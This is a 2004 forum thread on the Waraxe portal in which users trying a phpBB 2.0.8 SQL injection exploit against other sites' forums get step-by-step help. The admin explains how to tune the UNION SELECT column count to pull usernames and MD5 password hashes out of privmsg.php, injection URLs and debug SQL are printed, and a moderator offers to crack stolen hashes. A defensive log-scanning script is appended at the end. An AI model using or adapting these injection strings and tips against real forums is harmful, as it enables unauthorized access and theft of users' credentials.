Waraxe IT Security Portal
phpBB 208 sqlinjection
Posted: Wed Sep 08, 2004 9:00 pm
w00
Regular user
Joined: Sep 08, 2004
Posts: 8

Hello, I tried the phpBB 208 SQL injection exploit, which exposes the admin's or any other user's MD5 hash. But the thing is I can't get it to work on some phpBB forums. I end up in debug mode. This is the debug I get (posted below). Is there any way I can modify the SQL injection a little bit so it works on other sites too? Thanks for any help.

*I replaced the real name with HOST
Code:

Could not query private message post information

DEBUG MODE

SQL Error : 1222 The used SELECT statements have a different number of columns

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbbHOST_privmsgs pm, phpbbHOST_privmsgs_text pmt, phpbbHOST_users u, phpbbHOST_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 1087 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 1087 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid

Line : 238
File : /home/fhlinux194/p/HOST.com/user/htdocs/phpBB2/privmsg.php

Posted: Wed Sep 08, 2004 9:06 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Well, the SQL error message is clear:

"SQL Error : 1222 The used SELECT statements have a different number of columns"

So you have to

1. count how many columns the original query contains
2. modify the UNION query according to the previous results.

Posted: Wed Sep 08, 2004 9:35 pm
w00
Regular user
Joined: Sep 08, 2004
Posts: 8

waraxe wrote:
Well, the SQL error message is clear:

"SQL Error : 1222 The used SELECT statements have a different number of columns"

So you have to

1. count how many columns the original query contains
2. modify the UNION query according to the previous results.


Yes, that was my point actually. I'm sorry I made it unclear what my problem really is. I don't know how to count the columns in a phpBB forum. I don't suppose they mean the amount of "threads" there are, like "C++", "Visual Basic" etc. And where exactly do I modify the amount of columns? Do I change the amount of "NULL's" to the amount of columns present? And about the UNION, I guess that's automatically corrected after the columns are corrected, or am I wrong here too?

Posted: Thu Sep 09, 2004 11:10 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

If we look at the original UNION query -
"UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users",
then we can count 31 columns.
For some reason that phpBB installation has a different number of columns in the related table. Probably more than 31, but it can be less too. The SQL error message is not telling us "more" or "less", just "not equal".
So start with 29 or 30 columns and then move further - 31, 32, 33, etc.
If you no longer get this SQL error (#SQL 1222), then you have now tweaked the column count in the UNION query. And next maybe you need to reposition the output columns - "username" and "user_password".

Posted: Thu Sep 09, 2004 1:30 pm
w00
Regular user
Joined: Sep 08, 2004
Posts: 8

Thanks waraxe, I can't thank you enough. Thanks to you I got it to work.

Posted: Thu Sep 09, 2004 2:55 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

I'm happy to help! ;)

Posted: Wed Nov 17, 2004 9:43 am
Wang
Regular user
Joined: Oct 30, 2004
Posts: 5

privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%10pm.privmsgs_type=-99%10UNION%10SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%A0GET%A0phpbb_users%A0POST%A0user_level=1%A0LIMIT%A05/*

That string doesn't work :( How do I hack a forum 2.0.8 phpBB?

Posted: Wed Dec 01, 2004 2:05 am
ToXiC
Moderator
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus

Try MD5 hash tables ... or just PM me the hash, I will try to crack it.

Posted: Tue Dec 14, 2004 6:03 pm
katz
Beginner
Joined: Oct 09, 2004
Posts: 2

I'm sorry if this is inappropriate, but at a version 2.0.6 I got an error
Quote:
Could not query private message post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax near 'UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null' at line 5

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM forums_privmsgs pm, forums_privmsgs_text pmt, forums_users u, forums_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 92 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 92 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 246
File : /var/www/forums/privmsg.php

Do I have to change anything in the URL from the original statement in http://waraxe.us/?modname=sa&id=013?
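
A defender-side check for the request shape seen in this thread, as an added example that is not part of any post: it scans web access logs for privmsg.php requests in which the client supplies pm_sql_user or a UNION SELECT value. The log lines are constructed, and treating any client-supplied pm_sql_user as suspicious is an assumption about normal phpBB traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration (addresses and values are made up).
SAMPLE_LOG = """\
203.0.113.7 - - [08/Sep/2004:21:00:01 +0000] "GET /phpBB2/privmsg.php?folder=inbox HTTP/1.1" 200 5120
203.0.113.9 - - [08/Sep/2004:21:00:05 +0000] "GET /phpBB2/privmsg.php?mode=read&p=99&pm_sql_user=AND%20a=1%20UNION%20SELECT%200,0 HTTP/1.1" 200 2310
203.0.113.9 - - [08/Sep/2004:21:00:09 +0000] "GET /phpBB2/privmsg.php?mode=read&p=99&pm_sql_user=AND%A0a=1%10UNION%A0SELECT%A0null HTTP/1.1" 200 2298
198.51.100.4 - - [08/Sep/2004:21:01:10 +0000] "GET /phpBB2/search.php?search_keywords=union+select+syntax HTTP/1.1" 200 9001
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# The request string quoted in the thread uses %10 and %A0 where spaces would be,
# so control bytes and 0xA0 are folded to a plain space before keyword matching.
ODD_SPACE = re.compile(r'[\x00-\x20\x7f-\xa0]+')
UNION_SELECT = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.IGNORECASE)


def scan(log_text):
    """Return [(client, [reasons])] for suspicious privmsg.php requests."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/privmsg.php"):
            continue  # this check is scoped to the script named in the debug output
        # latin-1 keeps bytes such as %A0 intact instead of turning them into U+FFFD
        params = parse_qs(url.query, keep_blank_values=True, encoding="latin-1")
        reasons = []
        if "pm_sql_user" in params:  # assumption: never sent by normal phpBB links
            reasons.append("pm_sql_user supplied by client")
        for name, values in params.items():
            if any(UNION_SELECT.search(ODD_SPACE.sub(" ", v)) for v in values):
                reasons.append("UNION SELECT in " + name)
        if reasons:
            findings.append((client, reasons))
    return findings


if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, "; ".join(reasons))
```
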